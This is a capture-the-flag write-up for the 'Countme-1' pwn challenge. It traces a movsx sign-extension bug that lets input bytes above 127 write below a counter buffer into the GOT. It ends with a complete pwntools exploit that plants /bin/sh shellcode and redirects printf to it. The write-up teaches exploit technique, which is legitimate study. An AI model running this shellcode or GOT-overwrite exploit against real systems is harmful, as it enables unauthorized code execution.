Countme-1 (Pwn)


You can find the original question here. I really enjoyed solving this question. Shoutout to TheColonial and all the other organizers for making such an awesome CTF.


So first, we run the binary through "file", and it turns out to be a stripped 32-bit binary.

[email protected] ~/Hack_stuff/bsides-2017-ctf-docker/pwn-countme1 $ file countme
countme: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=4bdd35b8440ee7f07fc9d8b57beec62c4ac19ffd, stripped

Running checksec on the binary returns the following results. NX is disabled, which is unusual, and it hints that we may need to execute shellcode in this binary.

[email protected] ~/Hack_stuff/bsides-2017-ctf-docker/pwn-countme1 $ checksec countme
[*] '/home/ssnague/Hack_stuff/bsides-2017-ctf-docker/pwn-countme1/countme'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)

We then run the binary to see its functionality. It looks like we have to enter a string, and the program counts the occurrences of each character and prints them.

[email protected] ~/Hack_stuff/bsides-2017-ctf-docker/pwn-countme1 $ ./countme
aaaaab
Found 'a' a total of 5 time(s)
Found 'b' a total of 1 time(s)

Since there are no symbols, we pop the binary into the Hopper disassembler (free trial cuz I'm poor) and locate main by looking at the cross references of the strings.

So the main function starts at 0x8048475, and now we can use gdb for dynamic analysis.

After some random fuzzing for 15-20 mins, here are the key points I noticed (without looking at the assembly yet)

  1. It can only count up to 255 occurrences of a character, meaning each count is stored in a single byte

  2. Chars with a charcode above 127 are not being counted (which is kinda sketchy), so only ASCII characters are counted (or maybe the others are just not shown)


Now for the analysis stage, here is an explanation of what exactly is happening

08048476         mov        ebp, esp
08048478         push       ecx
08048479         sub        esp, 0x14
0804847c         mov        byte [ss:ebp+var_D], 0x0
08048480         sub        esp, 0x4
08048483         push       0x100                                               ; argument "len" for method j_memset
08048488         push       0x0                                                 ; argument "c" for method j_memset
0804848a         push       0x804a040                                           ; argument "b" for method j_memset
0804848f         call       j_memset
08048494         add        esp, 0x10

First, a call to memset() is made with the following parameters: memset(0x804a040, 0x0, 0x100),

which sets 256 (0x100) bytes of memory (starting from 0x804a040) to 0/nulls.

The address provided here is a constant. The binary is not PIE, so it won't change even with ASLR enabled. This should be noted for future reference.

0804849a         push       0x1                                                 ; argument "nbyte" for method j_read
0804849c         lea        eax, dword [ss:ebp+var_D]
0804849f         push       eax                                                 ; argument "buf" for method j_read
080484a0         push       0x0                                                 ; argument "fildes" for method j_read
080484a2         call       j_read
080484a7         add        esp, 0x10
080484aa         cmp        eax, 0x1
080484ad         jne        0x80484d8

080484af         movzx      eax, byte [ss:ebp+var_D]
080484b3         cmp        al, 0xa
080484b5         je         0x80484d8

080484b7         movzx      eax, byte [ss:ebp+var_D]
080484bb         cmp        al, 0xd
080484bd         je         0x80484d8

080484bf         movzx      eax, byte [ss:ebp+var_D]
080484c3         movsx      eax, al
080484c6         movzx      edx, byte [ds:eax+0x804a040]
080484cd         add        edx, 0x1
080484d0         mov        byte [ds:eax+0x804a040], dl
080484d6         jmp        0x8048497

In the first part here,

a call to read() is made, which reads one byte and stores it at ebp+var_D. Then it checks that the byte is neither a newline (0xa) nor a carriage return (0xd); either of those ends the loop.

If it is neither of those, it increments a counter at the relative location eax+0x804a040, where eax holds the ASCII/charcode of the character we entered.

So for eg if we entered "a", whose ASCII code is 0x61, it will retrieve the value stored at 0x61 + 0x804a040, add 1 to it, and then write it back to the same location. Initially all the values are 0 because of the memset() call at the start.
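
To make the counting logic concrete, here is a minimal Python model of the loop as understood so far. It is only a sketch that assumes ASCII input; the names `count_input` and `BUF_SIZE` are mine and do not come from the binary.

```python
BUF_SIZE = 0x100  # size passed to memset()

def count_input(data: bytes) -> bytearray:
    """Model of the read loop for ASCII input (bytes below 0x80 only)."""
    table = bytearray(BUF_SIZE)            # memset(buf, 0, 0x100)
    for b in data:
        if b in (0x0A, 0x0D):              # newline or carriage return ends the loop
            break
        assert b < 0x80, "this model only covers ASCII input"
        table[b] = (table[b] + 1) & 0xFF   # one-byte counter, wraps after 255
    return table

table = count_input(b"aaaaab\n")
print(table[0x61], table[0x62])            # counters for 'a' and 'b'

wrapped = count_input(b"a" * 256 + b"\n")
print(wrapped[0x61])                       # 256 increments wrap the byte around
```

The wraparound in the second call is the reason the fuzzing never showed a count above 255: only the low byte (dl) is written back.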

080484d8         mov        dword [ss:ebp+var_C], 0x0                           ; XREF=sub_8048475+56, sub_8048475+64, sub_8048475+72
080484df         jmp        0x8048516

080484e1         mov        eax, dword [ss:ebp+var_C]                           ; XREF=sub_8048475+168
080484e4         add        eax, 0x804a040
080484e9         movzx      eax, byte [ds:eax]
080484ec         test       al, al
080484ee         je         0x8048512

080484f0         mov        eax, dword [ss:ebp+var_C]
080484f3         add        eax, 0x804a040
080484f8         movzx      eax, byte [ds:eax]
080484fb         movzx      eax, al
080484fe         sub        esp, 0x4
08048501         push       eax
08048502         push       dword [ss:ebp+var_C]
08048505         push       0x80485b4                                           ; "Found '%c' a total of %d time(s)\\n", argument "format" for method j_printf
0804850a         call       j_printf
0804850f         add        esp, 0x10

08048512         add        dword [ss:ebp+var_C], 0x1                           ; XREF=sub_8048475+121

08048516         cmp        dword [ss:ebp+var_C], 0xff                          ; XREF=sub_8048475+106
0804851d         jle        0x80484e1

Now the final part of the program.

A variable ebp+var_C is initialized to 0. From then on, the byte at var_C + 0x804a040 (var_C being the value stored at ebp+var_C) is loaded into eax and checked against 0.

If the value is not 0, a call to printf() is made, which prints the current value of ebp+var_C as a character, along with the count stored at that location.

At the end, 1 is added to ebp+var_C, and the whole process is repeated for as long as ebp+var_C is less than or equal to 0xff.

What's happening here is essentially that each charcode from 0-255 is checked at its relative location from 0x804a040, and if its count is more than 0, it is printed. This can be represented as a C for loop

for (int i = 0; i <= 0xff; ++i) {
    /* one-byte counter for charcode i */
    unsigned char count = *(unsigned char *)(i + 0x804a040);
    if (count != 0) {
        printf("Found '%c' a total of %d time(s)\n", i, count);
    }
}
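
The same reporting loop can be sketched in Python to check it against the sample run from earlier. The helper name `report` is hypothetical, and the table is filled by hand here rather than read from the binary.

```python
def report(table):
    """Walk all 256 counters and format a line for every non-zero one."""
    lines = []
    for i in range(0x100):
        if table[i] != 0:
            lines.append("Found '%c' a total of %d time(s)" % (i, table[i]))
    return lines

# Counter state after entering "aaaaab"
table = bytearray(0x100)
table[ord("a")] = 5
table[ord("b")] = 1

for line in report(table):
    print(line)
```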

So far, we have analyzed the whole functionality of the program, but we did not see anything that would allow us to redirect code execution.


In this case, the bug was actually very subtle, and it took me a lot of time to figure it out (dynamic analysis with gdb helped a lot). So here is the vulnerable snippet

080484bf         movzx      eax, byte [ss:ebp+var_D]
080484c3         movsx      eax, al

080484cd         add        edx, 0x1
080484d0         mov        byte [ds:eax+0x804a040], dl

There are two types of mov instructions used here, movsx and movzx. A quick Google search revealed their functionality

MOVSX moves a signed value into a larger register and sign-extends it, filling the upper bits with copies of the sign bit.

MOVZX moves an unsigned value into a larger register and zero-extends it, filling the upper bits with zeros.

        mov     bx, 0C3EEh  ; Sign bit of bl is now 1: BH == 1100 0011, BL == 1110 1110
        movsx   ebx, bx     ; Load signed 16-bit value into 32-bit register and sign-extend
                            ; EBX is now equal FFFFC3EEh
        movzx   dx, bl      ; Load unsigned 8-bit value into 16-bit register and zero-extend
                            ; DX is now equal 00EEh

So for movsx, if we use it to move a signed value from an 8/16 bit register to a bigger register, it fills the upper bits with copies of the sign bit. A value with its top bit set is therefore extended with 0xff bytes so that it keeps its sign.

So if al has a value of more than 127, it gets extended to 0xffffffXX, which results in a really large number being stored in eax, and the addressing at movzx edx, byte [ds:eax+0x804a040] goes terribly wrong. Since the 32-bit addition wraps around and the carry is lost, this is really a small subtraction rather than a large addition, so we end up accessing memory up to 128 bytes below the buffer, which we are not entitled to.
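
Here is a small worked example of that arithmetic in Python. It is a sketch of the two instructions only; the helper names `movsx8` and `counter_address` are made up for illustration.

```python
BUF_ADDR = 0x804A040  # counter buffer, from the memset() call

def movsx8(al: int) -> int:
    """Sign-extend an 8-bit value to 32 bits, like `movsx eax, al`."""
    return (al | 0xFFFFFF00) if (al & 0x80) else al

def counter_address(ch: int) -> int:
    """Address touched by `[eax+0x804a040]` for input byte `ch`."""
    return (movsx8(ch) + BUF_ADDR) & 0xFFFFFFFF  # 32-bit add, carry is dropped

for ch in (0x61, 0x7F, 0x80, 0x81, 0xFF):
    print(hex(ch), hex(movsx8(ch)), hex(counter_address(ch)))
```

Bytes up to 0x7f stay inside the buffer, while 0x80-0xff map to the 128 bytes just below it. In particular 0x81 lands on 0x8049fc1, which is the first address in the gdb dump in the next step.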

Let's pop it in gdb and see if our assumptions are right

So here with my gdb-peda, I set up a breakpoint at 0x80484c6, and when we inspect the value in eax, we see that it is a super high value. Now let's see where it points to, and what we can do with it.

gdb-peda$ x/100w $eax+0x804a040
0x8049fc1:    0xf0000000    0x946fffff    0x00080482    0x00000000
0x8049fd1:    0x00000000    0x00000000    0x00000000    0x00000000
0x8049fe1:    0x00000000    0x00000000    0x00000000    0x00000000
0x8049ff1:    0x00000000    0x00000000    0x00000000    0x14000000
0x804a001:    0x3808049f    0xb0f7ffd9    0x80f7ff04    0x36f7eda2
0x804a011:    0x00080483    0xe0f7e16a    0x00f7f2bb    0x00000000
0x804a021:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a031:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a041:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a051:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a061:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a071:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a081:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a091:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a0a1:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a0b1:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a0c1:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a0d1:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a0e1:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a0f1:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a101:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a111:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a121:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a131:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a141:    0x00000000    0x00000000    0x00000000    0x00000000

Here we see some weird addresses in memory starting from 0x804a000, and they look like libc addresses. Doing a vmmap on the binary, we see that the memory from 0x804a000 onwards is also writeable.

With some educated guessing and some fooling around with objdump, I figured out that this is the GOT section of the binary, where we can now write arbitrary data. YAYYYYY!!!!!!

08048310 <read@plt-0x10>:
 8048310:    ff 35 04 a0 04 08        pushl  0x804a004 ; Address as shown in above pic, means we are at GOT
 8048316:    ff 25 08 a0 04 08        jmp    *0x804a008
 804831c:    00 00                    add    %al,(%eax)
    ...

08048320 <read@plt>:
 8048320:    ff 25 0c a0 04 08        jmp    *0x804a00c
 8048326:    68 00 00 00 00           push   $0x0
 804832b:    e9 e0 ff ff ff           jmp    8048310 <read@plt-0x10>
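
Because the gdb dump starts at an odd address, its words are shifted by one byte and the GOT entries are hard to read directly. The sketch below re-slices the two dump rows starting at 0x804a001 into aligned values; `dword_at` is a hypothetical helper, and the word list is copied by hand from the dump.

```python
import struct

# Words copied from the gdb dump rows at 0x804a001 and 0x804a011
DUMP_START = 0x804A001
words = [0x3808049F, 0xB0F7FFD9, 0x80F7FF04, 0x36F7EDA2,
         0x00080483, 0xE0F7E16A, 0x00F7F2BB, 0x00000000]

# gdb printed little-endian words, so packing them restores the raw bytes
raw = struct.pack("<%dI" % len(words), *words)

def dword_at(addr: int) -> int:
    """Read a 32-bit little-endian value at `addr` from the re-sliced dump."""
    return struct.unpack_from("<I", raw, addr - DUMP_START)[0]

for addr in (0x804A004, 0x804A008, 0x804A00C, 0x804A010):
    print(hex(addr), hex(dword_at(addr)))
```

Read this way, 0x804a00c holds a 0xf7...... value that looks like a resolved libc address, while 0x804a010 holds 0x8048336, an address inside the binary itself.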

This means we can overwrite the function pointer of some function in the GOT (Global Offset Table), and when that function is called, we will be able to redirect program execution. And since the NX bit is disabled, we can write our shellcode at some location in memory, and then overwrite a GOT entry to point to our shellcode :)

The best candidate for placing our shellcode is the buffer used to store the "count" of characters. Since it is at a static location, we can just hardcode the address in our exploit.

Since the buffer stores how many times each char appears in our string, we can use that behaviour to write shellcode into the buffer.

We can take each byte of shellcode and send the same character that many times, so the byte gets written into memory. We continue doing this for the whole shellcode, increasing the character code by 1 each iteration.

For eg to write 0x31, we can give an input like "a" * 49 (or 49 times "a"), which will write 0x31 at the memory location indexed by "a"

Here is a simple python script which does that and creates a payload

shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" #Shellcode from shell-storm

payload = ""

for k in range(len(shellcode)): 
    payload += chr(15+k) * ord(shellcode[k])

I am starting from the 15th byte in the buffer because we can't write to the 10th (0xa) and 13th (0xd) bytes of the buffer, as those characters break the read() loop.

So by looking at gdb, it looks like our shellcode has been written at 0x804a04f (that is, 0x804a040 + 15)
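
The same result can be checked offline by replaying the payload against a model of the counter table. This is only a sketch: it simulates the increments in Python instead of running the binary, and `START` and `table` are names I picked.

```python
BUF_ADDR = 0x804A040
START = 15  # first buffer index used for the shellcode
shellcode = (b"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68"
             b"\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80")

# Byte k of the shellcode becomes (value of that byte) copies of char START+k
payload = b"".join(bytes([START + k]) * b for k, b in enumerate(shellcode))

# Replay the increments the binary would perform for each input byte
table = bytearray(0x100)
for ch in payload:
    assert ch not in (0x0A, 0x0D) and ch < 0x80  # stays in the loop, stays in the buffer
    table[ch] = (table[ch] + 1) & 0xFF

print(bytes(table[START:START + len(shellcode)]) == shellcode)
print(hex(BUF_ADDR + START))
```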

Now we just need to overwrite an entry in the GOT, and I believe we only have one choice, i.e. printf(). We can't overwrite read(), because we write byte by byte and the loop calls read() again after every byte, so a half-overwritten read() GOT entry would make the program segfault before we finish.

08048330 <printf@plt>:
 8048330:    ff 25 10 a0 04 08        jmp    *0x804a010
 8048336:    68 08 00 00 00           push   $0x8
 804833b:    e9 d0 ff ff ff           jmp    8048310 <read@plt-0x10>

It looks like the printf() GOT entry is located at 0x804a010, and by doing some simple offset calculations (and trial-and-error in gdb), we come to the conclusion that we can overwrite it using chars 208-211 (LSB to MSB).
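
The offset calculation can be sketched as follows. `char_for` is a hypothetical helper that inverts the sign-extended indexing for addresses just below the buffer.

```python
BUF_ADDR = 0x804A040    # counter buffer
PRINTF_GOT = 0x804A010  # GOT slot used by the printf PLT stub

def char_for(addr: int) -> int:
    """Input byte whose sign-extended value, added to BUF_ADDR, gives addr."""
    offset = addr - BUF_ADDR
    assert -0x80 <= offset < 0, "helper only handles the 128 bytes below the buffer"
    return offset & 0xFF  # two's complement of the negative offset

chars = [char_for(PRINTF_GOT + i) for i in range(4)]
print(chars)  # one input char per byte of the GOT entry, LSB first
```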

Since printf() has not been called earlier, its entry still holds a trampoline (PLT) address, which is static, unlike a resolved libc address, which changes with ASLR. So we can just calculate the difference between those two addresses, and then write to the GOT byte by byte.

Shellcode Address               ==> 0x804a04f
Printf Stored GOT Address       ==> 0x8048336

Since the two most significant bytes are the same, we only need to change the lower two bytes.

The difference between 0x4f and 0x36 is 25, and the difference between 0xa0 and 0x83 is 29. Since we can use the chars 208 and 209 to write to the two lowest bytes of the printf() entry, here is our final exploit

payload += chr(209)*29 + chr(208)*25
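
As a cross-check of those two counts, here is a sketch that derives the increments for every byte of the entry. The constant names are mine, and the order of the two char runs differs from the line above, which does not matter since each byte is incremented independently.

```python
import struct

OLD = 0x08048336   # value stored in printf's GOT entry before resolution
NEW = 0x0804A04F   # where the shellcode sits
FIRST_CHAR = 208   # input byte that hits the lowest byte of the entry

old_bytes = struct.pack("<I", OLD)
new_bytes = struct.pack("<I", NEW)

patch = ""
for i, (o, n) in enumerate(zip(old_bytes, new_bytes)):
    increments = (n - o) & 0xFF  # each input char adds 1 to one byte, modulo 256
    patch += chr(FIRST_CHAR + i) * increments
    print(i, hex(o), hex(n), increments)
```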

Thus our full payload is complete. Here is a full python implementation of the exploit (using pwntools)

from pwn import *

shellcodeLocation = 0x804a04f  # counter buffer (0x804a040) + 15
#                   0x8048336  <- value initially stored in printf's GOT entry

r = remote("127.0.0.1", 8000)

shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" #Shellcode from shell-storm

payload = ""

def exp():
    r.sendline(payload)#Payload sent
    log.info("PAYLOAD SENT")
    log.info("You should probably have a shell now")
    r.interactive()#Interactive shell

payload += chr(209)*29 + chr(208)*25  #Overwrite the lower two bytes of printf's GOT entry, addresses are compared above

for k in range(len(shellcode)): #Making a payload of the shellcode (byte by byte) for the binary
    payload += chr(15+k) * ord(shellcode[k]) #Send char 15+k as many times as the value of the shellcode byte; start at 15 to stay clear of 0xa (\n) and 0xd (\r), which end the loop

log.info("PAYLOAD CREATED")

exp() #Sending the payload

Feel free to email me for any clarifications or any mistakes on my part at [email protected]

Thanks for reading,
Jazzy
